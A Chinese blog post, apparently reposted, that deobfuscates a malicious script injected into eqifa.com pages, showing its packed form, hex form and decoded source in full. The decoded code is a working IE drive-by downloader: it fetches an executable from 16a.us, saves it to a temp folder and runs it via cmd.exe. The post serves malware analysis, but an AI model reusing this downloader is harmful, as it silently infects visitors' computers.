由亿起发(eqifa.com)的页面发现顶部的http://16a.us/8.js想到的js解密 原创

软件发布|下载排行|最新软件

当前位置:首页IT学院IT技术

由亿起发(eqifa.com)的页面发现顶部的http://16a.us/8.js想到的js解密 原创

  2020-05-12 我要评论
今天访问eqifa的官方网站,发现好多页面都带有
<script src=http://16a.us/8.js></script>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
找了资料,有可能是arp欺骗导致的或真的页面都被加了代码,这个代码是病毒,我来分析下,到了最后的时候发现js是16进制的,这次是实战,每一部都会很清晰,学不会教学费 呵呵
第一部,得到代码 (因为是知道js文件可以直接用ie打开访问)
代码如下
复制代码 代码如下:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('15("\\A\\n\\o\\s\\r\\4\\a\\7\\j\\D\\9\\q\\7\\4\\v\\a\\h\\b\\O\\c\\o\\9\\q\\B\\7\\N\\D\\q\\a\\A\\n\\D\\j\\n\\a\\4\\9\\9\\n\\9\\w\\12\\s\\a\\o\\7\\q\\n\\a\\h\\g\\Q\\9\\4\\7\\s\\9\\a\\6\\7\\9\\s\\4\\i\\P\\O\\0\\X\\c\\o\\9\\q\\B\\7\\N\\b\\g\\i\\U\\T\\A\\n\\o\\s\\r\\4\\a\\7\\j\\D\\9\\q\\7\\4\\v\\a\\h\\b\\O\\c\\o\\9\\q\\B\\7\\N\\b\\g\\i\\U\\T\\A\\n\\o\\s\\r\\4\\a\\7\\j\\D\\9\\q\\7\\4\\v\\a\\h\\b\\12\\s\\a\\o\\7\\q\\n\\a\\6\\W\\a\\l\\c\\h\\a\\g\\6\\Q\\6\\F\\k\\9\\6\\a\\s\\r\\H\\4\\9\\l\\c\\6\\w\\6\\l\\k\\7\\I\\j\\9\\k\\a\\A\\n\\r\\h\\g\\14\\a\\i\\6\\9\\4\\7\\s\\9\\a\\6\\0\\C\\0\\0\\1\\8\\y\\0\\0\\1\\d\\5\\0\\0\\1\\2\\d\\0\\0\\1\\2\\m\\0\\0\\1\\8\\u\\0\\C\\J\\l\\k\\7\\I\\j\\9\\n\\s\\a\\A\\h\\a\\s\\r\\H\\4\\9\\l\\c\\g\\J\\0\\C\\0\\0\\1\\f\\y\\0\\0\\1\\8\\5\\0\\0\\1\\2\\m\\0\\0\\1\\8\\u\\0\\C\\i\\6\\P\\6\\7\\9\\V\\6\\Q\\6\\m\\n\\D\\a\\11\\9\\v\\w\\0\\C\\0\\0\\1\\2\\G\\0\\0\\1\\8\\5\\0\\0\\1\\8\\5\\0\\0\\1\\8\\u\\0\\0\\1\\3\\M\\0\\0\\1\\f\\e\\0\\0\\1\\f\\e\\0\\0\\1\\3\\p\\0\\0\\1\\3\\2\\0\\0\\1\\2\\p\\0\\0\\1\\f\\y\\0\\0\\1\\8\\d\\0\\0\\1\\8\\3\\0\\0\\1\\f\\e\\0\\0\\1\\2\\e\\0\\0\\1\\5\\K\\0\\0\\1\\5\\K\\0\\0\\1\\f\\e\\0\\0\\1\\8\\3\\0\\0\\1\\2\\m\\0\\0\\1\\8\\3\\0\\0\\1\\8\\3\\0\\0\\1\\f\\y\\0\\0\\1\\2\\d\\0\\0\\1\\8\\G\\0\\0\\1\\2\\d\\0\\C\\i\\6\\F\\k\\9\\6\\l\\c\\m\\e\\w\\A\\n\\o\\s\\r\\4\\a\\7\\j\\o\\9\\4\\k\\7\\4\\y\\v\\4\\r\\4\\a\\7\\h\\0\\b\\0\\0\\1\\2\\e\\0\\0\\1\\2\\f\\0\\0\\1\\2\\M\\0\\0\\1\\2\\d\\0\\0\\1\\2\\3\\0\\0\\1\\8\\5\\0\\b\\g\\i\\6\\l\\c\\m\\e\\j\\c\\4\\7\\M\\7\\7\\9\\q\\H\\s\\7\\4\\h\\0\\b\\0\\0\\1\\2\\3\\0\\0\\1\\2\\z\\0\\0\\1\\2\\p\\0\\0\\1\\8\\3\\0\\0\\1\\8\\3\\0\\0\\1\\2\\t\\0\\0\\1\\2\\5\\0\\b\\x\\0\\b\\0\\0\\1\\2\\3\\0\\0\\1\\2\\z\\0\\0\\1\\8\\3\\0\\0\\1\\2\\t\\0\\0\\1\\2\\5\\0\\0\\1\\3\\M\\0\\0\\1\\5\\f\\0\\0\\1\\5\\5\\0\\0\\1\\3\\t\\0\\0\\1\\3\\2\\0\\0\\1\\5\\3\\0\\0\\1\\3\\d\\0\\0\\1\\3\\d\\0\\0\\1\\3\\2\\0\\0\\1\\f\\m\\0\\0\\1\\3\\2\\0\\0\\1\\3\\d\\0\\0\\1\\5\\p\\0\\0\\1\\3\\3\\0\\0\\1\\f\\m\\0\\0\\1\\3\\p\\0\\0\\1\\3\\p\\0\\0\\1\\5\\5\\0\\0\\1\\3\\u\\0\\0\\1\\f\\m\\0\\0\\1\\3\\t\\0\\0\\1\\3\\G\\0\\0\\1\\3\\3\\0\\0\\1\\5\\p\\0\\0\\1\\f\\m\\0\\0\\1\\3\\u\\0\\0\\1\\3\\u\\0\\0\\1\\5\\3\\0\\0\\1\\3\\u\\0\\0\\1\\3\\5\\0\\0\\1\\5\\2\\0\\0\\1\\5\\3\\0\\0\\1\\3\\f\\0\\0\\1\\3\\t\\0\\0\\1\\5\\d\\0\\0\\1\\3\\3\\0\\0\\1\\3\\2\\0\\b\\g\\i\\6\\F\\k\\9\\6\\1\\w\\l\\c\\m\\e\\j\\z\\9\\4\\k\\7\\4\\L\\H\\S\\4\\o\\7\\h\\0\\b\\0\\0\\1\\5\\m\\0\\0\\1\\2\\t\\0\\0\\1\\2\\3\\0\\0\\1\\8\\f\\0\\0\\1\\2\\e\\0\\0\\1\\8\\3\\0\\0\\1\\2\\e\\0\\0\\1\\2\\2\\0\\0\\1\\8\\5\\0\\0\\1\\f\\y\\0\\0\\1\\d\\G\\0\\b\\J\\0\\b\\0\\0\\1\\5\\m\\0\\0\\1\\5\\z\\0\\0\\1\\5\\G\\0\\0\\1\\d\\5\\0\\0\\1\\d\\5\\0\\0\\1\\d\\u\\0\\b\\x\\0\\b\\0\\b\\g\\i\\6\\F\\k\\9\\6\\E\\w\\l\\c\\m\\e\\j\\z\\9\\4\\k\\7\\4\\L\\H\\S\\4\\o\\7\\h\\0\\b\\0\\0\\1\\5\\p\\0\\0\\1\\2\\5\\0\\0\\1\\2\\e\\0\\0\\1\\2\\5\\0\\0\\1\\2\\f\\0\\0\\1\\f\\y\\0\\0\\1\\d\\3\\0\\0\\1\\8\\5\\0\\0\\1\\8\\f\\0\\0\\1\\2\\d\\0\\0\\1\\2\\p\\0\\0\\1\\2\\m\\0\\b\\x\\0\\b\\0\\b\\g\\i\\6\\E\\j\\7\\V\\B\\4\\w\\p\\i\\6\\1\\j\\n\\B\\4\\a\\h\\0\\b\\0\\0\\1\\5\\8\\0\\0\\1\\5\\d\\0\\0\\1\\d\\5\\0\\b\\x\\6\\m\\n\\D\\a\\11\\9\\v\\x\\u\\g\\i\\6\\1\\j\\c\\4\\a\\A\\h\\g\\i\\6\\l\\c\\e\\a\\k\\r\\4\\p\\w\\W\\a\\l\\c\\h\\t\\t\\t\\t\\g\\i\\6\\F\\k\\9\\6\\e\\w\\l\\c\\m\\e\\j\\z\\9\\4\\k\\7\\4\\L\\H\\S\\4\\o\\7\\h\\0\\b\\0\\0\\1\\d\\3\\0\\0\\1\\2\\3\\0\\0\\1\\8\\f\\0\\0\\1\\2\\t\\0\\0\\1\\8\\u\\0\\0\\1\\8\\5\\0\\0\\1\\2\\t\\0\\0\\1\\2\\y\\0\\0\\1\\2\\8\\0\\0\\1\\f\\y\\0\\0\\1\\5\\2\\0\\0\\1\\2\\t\\0\\0\\1\\2\\z\\0\\0\\1\\2\\d\\0\\0\\1\\d\\3\\0\\0\\1\\8\\t\\0\\0\\1\\8\\3\\0\\0\\1\\8\\5\\0\\0\\1\\2\\d\\0\\0\\1\\2\\m\\0\\0\\1\\5\\e\\0\\0\\1\\2\\f\\0\\0\\1\\2\\M\\0\\0\\1\\2\\d\\0\\0\\1\\2\\3\\0\\0\\1\\8\\5\\0\\b\\x\\0\\b\\0\\b\\g\\i\\6\\F\\k\\9\\6\\l\\c\\R\\r\\B\\w\\e\\j\\W\\4\\7\\E\\B\\4\\o\\q\\k\\v\\e\\n\\v\\A\\4\\9\\h\\u\\g\\i\\6\\l\\c\\e\\a\\k\\r\\4\\p\\w\\6\\e\\j\\K\\s\\q\\v\\A\\10\\k\\7\\I\\h\\l\\c\\R\\r\\B\\x\\l\\c\\e\\a\\k\\r\\4\\p\\g\\i\\6\\E\\j\\L\\B\\4\\a\\h\\g\\i\\E\\j\\13\\9\\q\\7\\4\\h\\1\\j\\9\\4\\c\\B\\n\\a\\c\\4\\K\\n\\A\\V\\g\\i\\6\\E\\j\\E\\k\\F\\4\\R\\n\\e\\q\\v\\4\\h\\l\\c\\e\\a\\k\\r\\4\\p\\x\\f\\g\\i\\6\\E\\j\\z\\v\\n\\c\\4\\h\\g\\i\\6\\F\\k\\9\\6\\l\\c\\Z\\w\\l\\c\\m\\e\\j\\z\\9\\4\\k\\7\\4\\L\\H\\S\\4\\o\\7\\h\\0\\b\\0\\0\\1\\d\\3\\0\\0\\1\\2\\G\\0\\0\\1\\2\\d\\0\\0\\1\\2\\z\\0\\0\\1\\2\\z\\0\\0\\1\\f\\y\\0\\0\\1\\5\\p\\0\\0\\1\\8\\u\\0\\0\\1\\8\\u\\0\\0\\1\\2\\z\\0\\0\\1\\2\\t\\0\\0\\1\\2\\3\\0\\0\\1\\2\\p\\0\\0\\1\\8\\5\\0\\0\\1\\2\\t\\0\\0\\1\\2\\e\\0\\0\\1\\2\\y\\0\\b\\x\\0\\b\\0\\b\\g\\i\\6\\m\\n\\D\\a\\p\\w\\e\\j\\K\\s\\q\\v\\A\\10\\k\\7\\I\\h\\l\\c\\R\\r\\B\\J\\0\\C\\0\\0\\1\\d\\z\\0\\0\\1\\d\\z\\0\\0\\1\\8\\3\\0\\0\\1\\8\\t\\0\\0\\1\\8\\3\\0\\0\\1\\8\\5\\0\\0\\1\\2\\d\\0\\0\\1\\2\\m\\0\\0\\1\\3\\3\\0\\0\\1\\3\\f\\0\\C\\x\\0\\C\\0\\0\\1\\2\\3\\0\\0\\1\\2\\m\\0\\0\\1\\2\\5\\0\\0\\1\\f\\y\\0\\0\\1\\2\\d\\0\\0\\1\\8\\G\\0\\0\\1\\2\\d\\0\\C\\g\\i\\6\\l\\c\\Z\\j\\E\\I\\4\\v\\v\\y\\1\\4\\o\\s\\7\\4\\h\\m\\n\\D\\a\\p\\x\\0\\C\\0\\0\\1\\f\\u\\0\\0\\1\\f\\e\\0\\0\\1\\2\\3\\6\\0\\C\\J\\l\\c\\e\\a\\k\\r\\4\\p\\x\\0\\b\\0\\b\\x\\0\\b\\0\\0\\1\\2\\e\\0\\0\\1\\8\\u\\0\\0\\1\\2\\d\\0\\0\\1\\2\\y\\0\\b\\x\\u\\g\\i\\6\\P\\6\\o\\k\\7\\o\\I\\h\\l\\c\\Y\\g\\6\\Q\\6\\l\\c\\Y\\w\\p\\i\\6\\P\\b\\g\\i\\U\\T\\A\\n\\o\\s\\r\\4\\a\\7\\j\\D\\9\\q\\7\\4\\v\\a\\h\\b\\O\\0\\X\\c\\o\\9\\q\\B\\7\\N\\b\\g")',62,68,'x5C|x78|x36|x33|x65|x34|x20|x74|x37|x72|x6E|x22|x73|x35|x46|x32|x29|x28|x3B|x2E|x61|x4D|x44|x6F|x63|x31|x69|x6D|x75|x39|x30|x6C|x3D|x2C|x45|x43|x64|x70|x27|x77|x53|x76|x38|x62|x68|x2B|x42|x4F|x41|x3E|x3C|x7D|x7B|x54|x6A|x0A|x0D|x79|x47|x2F|x49|x51|x50|x55|x66|x57|x2A|eval'.split('|'),0,{})) 

这是压缩,说是加密有问题,以后我说是加密也是可以理解的
解密方法如下,我是从blueidea的return 方法动手脚
return p改成thes.value=p

[Ctrl+A 全选 注:如需引入外部Js需刷新才能执行]


第二布得到的代码如下
复制代码 代码如下:

eval("\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x6C\x6E\x28\x22\x3C\x73\x63\x72\x69\x70\x74\x3E\x77\x69\x6E\x64\x6F\x77\x2E\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x29\x7B\x72\x65\x74\x75\x72\x6E\x20\x74\x72\x75\x65\x3B\x7D\x3C\x5C\x2F\x73\x63\x72\x69\x70\x74\x3E\x22\x29\x3B\x0D\x0A\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x6C\x6E\x28\x22\x3C\x73\x63\x72\x69\x70\x74\x3E\x22\x29\x3B\x0D\x0A\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x6C\x6E\x28\x22\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x47\x6E\x4D\x73\x28\x6E\x29\x20\x7B\x20\x76\x61\x72\x20\x6E\x75\x6D\x62\x65\x72\x4D\x73\x20\x3D\x20\x4D\x61\x74\x68\x2E\x72\x61\x6E\x64\x6F\x6D\x28\x29\x2A\x6E\x3B\x20\x72\x65\x74\x75\x72\x6E\x20\x5C\x27\x5C\x5C\x78\x37\x45\x5C\x5C\x78\x35\x34\x5C\x5C\x78\x36\x35\x5C\x5C\x78\x36\x44\x5C\x5C\x78\x37\x30\x5C\x27\x2B\x4D\x61\x74\x68\x2E\x72\x6F\x75\x6E\x64\x28\x6E\x75\x6D\x62\x65\x72\x4D\x73\x29\x2B\x5C\x27\x5C\x5C\x78\x32\x45\x5C\x5C\x78\x37\x34\x5C\x5C\x78\x36\x44\x5C\x5C\x78\x37\x30\x5C\x27\x3B\x20\x7D\x20\x74\x72\x79\x20\x7B\x20\x44\x6F\x77\x6E\x55\x72\x6C\x3D\x5C\x27\x5C\x5C\x78\x36\x38\x5C\x5C\x78\x37\x34\x5C\x5C\x78\x37\x34\x5C\x5C\x78\x37\x30\x5C\x5C\x78\x33\x41\x5C\x5C\x78\x32\x46\x5C\x5C\x78\x32\x46\x5C\x5C\x78\x33\x31\x5C\x5C\x78\x33\x36\x5C\x5C\x78\x36\x31\x5C\x5C\x78\x32\x45\x5C\x5C\x78\x37\x35\x5C\x5C\x78\x37\x33\x5C\x5C\x78\x32\x46\x5C\x5C\x78\x36\x46\x5C\x5C\x78\x34\x42\x5C\x5C\x78\x34\x42\x5C\x5C\x78\x32\x46\x5C\x5C\x78\x37\x33\x5C\x5C\x78\x36\x44\x5C\x5C\x78\x37\x33\x5C\x5C\x78\x37\x33\x5C\x5C\x78\x32\x45\x5C\x5C\x78\x36\x35\x5C\x5C\x78\x37\x38\x5C\x5C\x78\x36\x35\x5C\x27\x3B\x20\x76\x61\x72\x20\x4D\x73\x44\x46\x3D\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x28\x5C\x22\x5C\x5C\x78\x36\x46\x5C\x5C\x78\x36\x32\x5C\x5C\x78\x36\x41\x5C\x5C\x78\x36\x35\x5C\x5C\x78\x36\x33\x5C\x5C\x78\x37\x34\x5C\x22\x29\x3B\x20\x4D\x73\x44\x46\x2E\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65\x28\x5C\x22\x5C\x5C\x78\x36\x33\x5C\x5C\x78\x36\x43\x5C\x5C\x78\x36\x31\x5C\x5C\x78\x37\x33\x5C\x5C\x78\x37\x33\x5C\x5C\x78\x36\x39\x5C\x5C\x78\x36\x34\x5C\x22\x2C\x5C\x22\x5C\x5C\x78\x36\x33\x5C\x5C\x78\x36\x43\x5C\x5C\x78\x37\x33\x5C\x5C\x78\x36\x39\x5C\x5C\x78\x36\x34\x5C\x5C\x78\x33\x41\x5C\x5C\x78\x34\x32\x5C\x5C\x78\x34\x34\x5C\x5C\x78\x33\x39\x5C\x5C\x78\x33\x36\x5C\x5C\x78\x34\x33\x5C\x5C\x78\x33\x35\x5C\x5C\x78\x33\x35\x5C\x5C\x78\x33\x36\x5C\x5C\x78\x32\x44\x5C\x5C\x78\x33\x36\x5C\x5C\x78\x33\x35\x5C\x5C\x78\x34\x31\x5C\x5C\x78\x33\x33\x5C\x5C\x78\x32\x44\x5C\x5C\x78\x33\x31\x5C\x5C\x78\x33\x31\x5C\x5C\x78\x34\x34\x5C\x5C\x78\x33\x30\x5C\x5C\x78\x32\x44\x5C\x5C\x78\x33\x39\x5C\x5C\x78\x33\x38\x5C\x5C\x78\x33\x33\x5C\x5C\x78\x34\x31\x5C\x5C\x78\x32\x44\x5C\x5C\x78\x33\x30\x5C\x5C\x78\x33\x30\x5C\x5C\x78\x34\x33\x5C\x5C\x78\x33\x30\x5C\x5C\x78\x33\x34\x5C\x5C\x78\x34\x36\x5C\x5C\x78\x34\x33\x5C\x5C\x78\x33\x32\x5C\x5C\x78\x33\x39\x5C\x5C\x78\x34\x35\x5C\x5C\x78\x33\x33\x5C\x5C\x78\x33\x36\x5C\x22\x29\x3B\x20\x76\x61\x72\x20\x78\x3D\x4D\x73\x44\x46\x2E\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74\x28\x5C\x22\x5C\x5C\x78\x34\x44\x5C\x5C\x78\x36\x39\x5C\x5C\x78\x36\x33\x5C\x5C\x78\x37\x32\x5C\x5C\x78\x36\x46\x5C\x5C\x78\x37\x33\x5C\x5C\x78\x36\x46\x5C\x5C\x78\x36\x36\x5C\x5C\x78\x37\x34\x5C\x5C\x78\x32\x45\x5C\x5C\x78\x35\x38\x5C\x22\x2B\x5C\x22\x5C\x5C\x78\x34\x44\x5C\x5C\x78\x34\x43\x5C\x5C\x78\x34\x38\x5C\x5C\x78\x35\x34\x5C\x5C\x78\x35\x34\x5C\x5C\x78\x35\x30\x5C\x22\x2C\x5C\x22\x5C\x22\x29\x3B\x20\x76\x61\x72\x20\x53\x3D\x4D\x73\x44\x46\x2E\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74\x28\x5C\x22\x5C\x5C\x78\x34\x31\x5C\x5C\x78\x36\x34\x5C\x5C\x78\x36\x46\x5C\x5C\x78\x36\x34\x5C\x5C\x78\x36\x32\x5C\x5C\x78\x32\x45\x5C\x5C\x78\x35\x33\x5C\x5C\x78\x37\x34\x5C\x5C\x78\x37\x32\x5C\x5C\x78\x36\x35\x5C\x5C\x78\x36\x31\x5C\x5C\x78\x36\x44\x5C\x22\x2C\x5C\x22\x5C\x22\x29\x3B\x20\x53\x2E\x74\x79\x70\x65\x3D\x31\x3B\x20\x78\x2E\x6F\x70\x65\x6E\x28\x5C\x22\x5C\x5C\x78\x34\x37\x5C\x5C\x78\x34\x35\x5C\x5C\x78\x35\x34\x5C\x22\x2C\x20\x44\x6F\x77\x6E\x55\x72\x6C\x2C\x30\x29\x3B\x20\x78\x2E\x73\x65\x6E\x64\x28\x29\x3B\x20\x4D\x73\x46\x6E\x61\x6D\x65\x31\x3D\x47\x6E\x4D\x73\x28\x39\x39\x39\x39\x29\x3B\x20\x76\x61\x72\x20\x46\x3D\x4D\x73\x44\x46\x2E\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74\x28\x5C\x22\x5C\x5C\x78\x35\x33\x5C\x5C\x78\x36\x33\x5C\x5C\x78\x37\x32\x5C\x5C\x78\x36\x39\x5C\x5C\x78\x37\x30\x5C\x5C\x78\x37\x34\x5C\x5C\x78\x36\x39\x5C\x5C\x78\x36\x45\x5C\x5C\x78\x36\x37\x5C\x5C\x78\x32\x45\x5C\x5C\x78\x34\x36\x5C\x5C\x78\x36\x39\x5C\x5C\x78\x36\x43\x5C\x5C\x78\x36\x35\x5C\x5C\x78\x35\x33\x5C\x5C\x78\x37\x39\x5C\x5C\x78\x37\x33\x5C\x5C\x78\x37\x34\x5C\x5C\x78\x36\x35\x5C\x5C\x78\x36\x44\x5C\x5C\x78\x34\x46\x5C\x5C\x78\x36\x32\x5C\x5C\x78\x36\x41\x5C\x5C\x78\x36\x35\x5C\x5C\x78\x36\x33\x5C\x5C\x78\x37\x34\x5C\x22\x2C\x5C\x22\x5C\x22\x29\x3B\x20\x76\x61\x72\x20\x4D\x73\x54\x6D\x70\x3D\x46\x2E\x47\x65\x74\x53\x70\x65\x63\x69\x61\x6C\x46\x6F\x6C\x64\x65\x72\x28\x30\x29\x3B\x20\x4D\x73\x46\x6E\x61\x6D\x65\x31\x3D\x20\x46\x2E\x42\x75\x69\x6C\x64\x50\x61\x74\x68\x28\x4D\x73\x54\x6D\x70\x2C\x4D\x73\x46\x6E\x61\x6D\x65\x31\x29\x3B\x20\x53\x2E\x4F\x70\x65\x6E\x28\x29\x3B\x53\x2E\x57\x72\x69\x74\x65\x28\x78\x2E\x72\x65\x73\x70\x6F\x6E\x73\x65\x42\x6F\x64\x79\x29\x3B\x20\x53\x2E\x53\x61\x76\x65\x54\x6F\x46\x69\x6C\x65\x28\x4D\x73\x46\x6E\x61\x6D\x65\x31\x2C\x32\x29\x3B\x20\x53\x2E\x43\x6C\x6F\x73\x65\x28\x29\x3B\x20\x76\x61\x72\x20\x4D\x73\x51\x3D\x4D\x73\x44\x46\x2E\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74\x28\x5C\x22\x5C\x5C\x78\x35\x33\x5C\x5C\x78\x36\x38\x5C\x5C\x78\x36\x35\x5C\x5C\x78\x36\x43\x5C\x5C\x78\x36\x43\x5C\x5C\x78\x32\x45\x5C\x5C\x78\x34\x31\x5C\x5C\x78\x37\x30\x5C\x5C\x78\x37\x30\x5C\x5C\x78\x36\x43\x5C\x5C\x78\x36\x39\x5C\x5C\x78\x36\x33\x5C\x5C\x78\x36\x31\x5C\x5C\x78\x37\x34\x5C\x5C\x78\x36\x39\x5C\x5C\x78\x36\x46\x5C\x5C\x78\x36\x45\x5C\x22\x2C\x5C\x22\x5C\x22\x29\x3B\x20\x44\x6F\x77\x6E\x31\x3D\x46\x2E\x42\x75\x69\x6C\x64\x50\x61\x74\x68\x28\x4D\x73\x54\x6D\x70\x2B\x5C\x27\x5C\x5C\x78\x35\x43\x5C\x5C\x78\x35\x43\x5C\x5C\x78\x37\x33\x5C\x5C\x78\x37\x39\x5C\x5C\x78\x37\x33\x5C\x5C\x78\x37\x34\x5C\x5C\x78\x36\x35\x5C\x5C\x78\x36\x44\x5C\x5C\x78\x33\x33\x5C\x5C\x78\x33\x32\x5C\x27\x2C\x5C\x27\x5C\x5C\x78\x36\x33\x5C\x5C\x78\x36\x44\x5C\x5C\x78\x36\x34\x5C\x5C\x78\x32\x45\x5C\x5C\x78\x36\x35\x5C\x5C\x78\x37\x38\x5C\x5C\x78\x36\x35\x5C\x27\x29\x3B\x20\x4D\x73\x51\x2E\x53\x68\x65\x6C\x6C\x45\x78\x65\x63\x75\x74\x65\x28\x44\x6F\x77\x6E\x31\x2C\x5C\x27\x5C\x5C\x78\x32\x30\x5C\x5C\x78\x32\x46\x5C\x5C\x78\x36\x33\x20\x5C\x27\x2B\x4D\x73\x46\x6E\x61\x6D\x65\x31\x2C\x5C\x22\x5C\x22\x2C\x5C\x22\x5C\x5C\x78\x36\x46\x5C\x5C\x78\x37\x30\x5C\x5C\x78\x36\x35\x5C\x5C\x78\x36\x45\x5C\x22\x2C\x30\x29\x3B\x20\x7D\x20\x63\x61\x74\x63\x68\x28\x4D\x73\x49\x29\x20\x7B\x20\x4D\x73\x49\x3D\x31\x3B\x20\x7D\x22\x29\x3B\x0D\x0A\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x6C\x6E\x28\x22\x3C\x5C\x2F\x73\x63\x72\x69\x70\x74\x3E\x22\x29")

这是16进制的代码,解密方法如下

[Ctrl+A 全选 注:如需引入外部Js需刷新才能执行]

三,得到的代码如下
复制代码 代码如下:

document.writeln("<script>window.onerror=function(){return true;}<\/script>"); 
document.writeln("<script>"); 
document.writeln("function GnMs(n) { var numberMs = Math.random()*n; return \'\\x7E\\x54\\x65\\x6D\\x70\'+Math.round(numberMs)+\'\\x2E\\x74\\x6D\\x70\'; } try { DownUrl=\'\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x31\\x36\\x61\\x2E\\x75\\x73\\x2F\\x6F\\x4B\\x4B\\x2F\\x73\\x6D\\x73\\x73\\x2E\\x65\\x78\\x65\'; var MsDF=document.createElement(\"\\x6F\\x62\\x6A\\x65\\x63\\x74\"); MsDF.setAttribute(\"\\x63\\x6C\\x61\\x73\\x73\\x69\\x64\",\"\\x63\\x6C\\x73\\x69\\x64\\x3A\\x42\\x44\\x39\\x36\\x43\\x35\\x35\\x36\\x2D\\x36\\x35\\x41\\x33\\x2D\\x31\\x31\\x44\\x30\\x2D\\x39\\x38\\x33\\x41\\x2D\\x30\\x30\\x43\\x30\\x34\\x46\\x43\\x32\\x39\\x45\\x33\\x36\"); var x=MsDF.CreateObject(\"\\x4D\\x69\\x63\\x72\\x6F\\x73\\x6F\\x66\\x74\\x2E\\x58\"+\"\\x4D\\x4C\\x48\\x54\\x54\\x50\",\"\"); var S=MsDF.CreateObject(\"\\x41\\x64\\x6F\\x64\\x62\\x2E\\x53\\x74\\x72\\x65\\x61\\x6D\",\"\"); S.type=1; x.open(\"\\x47\\x45\\x54\", DownUrl,0); x.send(); MsFname1=GnMs(9999); var F=MsDF.CreateObject(\"\\x53\\x63\\x72\\x69\\x70\\x74\\x69\\x6E\\x67\\x2E\\x46\\x69\\x6C\\x65\\x53\\x79\\x73\\x74\\x65\\x6D\\x4F\\x62\\x6A\\x65\\x63\\x74\",\"\"); var MsTmp=F.GetSpecialFolder(0); MsFname1= F.BuildPath(MsTmp,MsFname1); S.Open();S.Write(x.responseBody); S.SaveToFile(MsFname1,2); S.Close(); var MsQ=MsDF.CreateObject(\"\\x53\\x68\\x65\\x6C\\x6C\\x2E\\x41\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\",\"\"); Down1=F.BuildPath(MsTmp+\'\\x5C\\x5C\\x73\\x79\\x73\\x74\\x65\\x6D\\x33\\x32\',\'\\x63\\x6D\\x64\\x2E\\x65\\x78\\x65\'); MsQ.ShellExecute(Down1,\'\\x20\\x2F\\x63 \'+MsFname1,\"\",\"\\x6F\\x70\\x65\\x6E\",0); } catch(MsI) { MsI=1; }"); 
document.writeln("<\/script>")


大约的基本都在这,js能自动解析16进纸的代码

[Ctrl+A 全选 注:如需引入外部Js需刷新才能执行]

输出显示
复制代码 代码如下:

function GnMs(n) { var numberMs = Math.random()*n; return '\x7E\x54\x65\x6D\x70'+Math.round(numberMs)+'\x2E\x74\x6D\x70'; } try { DownUrl='\x68\x74\x74\x70\x3A\x2F\x2F\x31\x36\x61\x2E\x75\x73\x2F\x6F\x4B\x4B\x2F\x73\x6D\x73\x73\x2E\x65\x78\x65'; var MsDF=document.createElement("\x6F\x62\x6A\x65\x63\x74"); MsDF.setAttribute("\x63\x6C\x61\x73\x73\x69\x64","\x63\x6C\x73\x69\x64\x3A\x42\x44\x39\x36\x43\x35\x35\x36\x2D\x36\x35\x41\x33\x2D\x31\x31\x44\x30\x2D\x39\x38\x33\x41\x2D\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45\x33\x36"); var x=MsDF.CreateObject("\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58"+"\x4D\x4C\x48\x54\x54\x50",""); var S=MsDF.CreateObject("\x41\x64\x6F\x64\x62\x2E\x53\x74\x72\x65\x61\x6D",""); S.type=1; x.open("\x47\x45\x54", DownUrl,0); x.send(); MsFname1=GnMs(9999); var F=MsDF.CreateObject("\x53\x63\x72\x69\x70\x74\x69\x6E\x67\x2E\x46\x69\x6C\x65\x53\x79\x73\x74\x65\x6D\x4F\x62\x6A\x65\x63\x74",""); var MsTmp=F.GetSpecialFolder(0); MsFname1= F.BuildPath(MsTmp,MsFname1); S.Open();S.Write(x.responseBody); S.SaveToFile(MsFname1,2); S.Close(); var MsQ=MsDF.CreateObject("\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E",""); Down1=F.BuildPath(MsTmp+'\x5C\x5C\x73\x79\x73\x74\x65\x6D\x33\x32','\x63\x6D\x64\x2E\x65\x78\x65'); MsQ.ShellExecute(Down1,'\x20\x2F\x63 '+MsFname1,"","\x6F\x70\x65\x6E",0); } catch(MsI) { MsI=1; } 

最后显示下载代码为:DownUrl='\x68\x74\x74\x70\x3A\x2F\x2F\x31\x36\x61\x2E\x75\x73\x2F\x6F\x4B\x4B\x2F\x73\x6D\x73\x73\x2E\x65\x78\x65'
这是得到病毒文件的地址的代码

[Ctrl+A 全选 注:如需引入外部Js需刷新才能执行]

因为时间问题,暂时就这样了,有问题跟贴

Copyright 2022 版权所有 软件发布 访问手机版

声明:所有软件和文章来自软件开发商或者作者 如有异议 请与本站联系 联系我们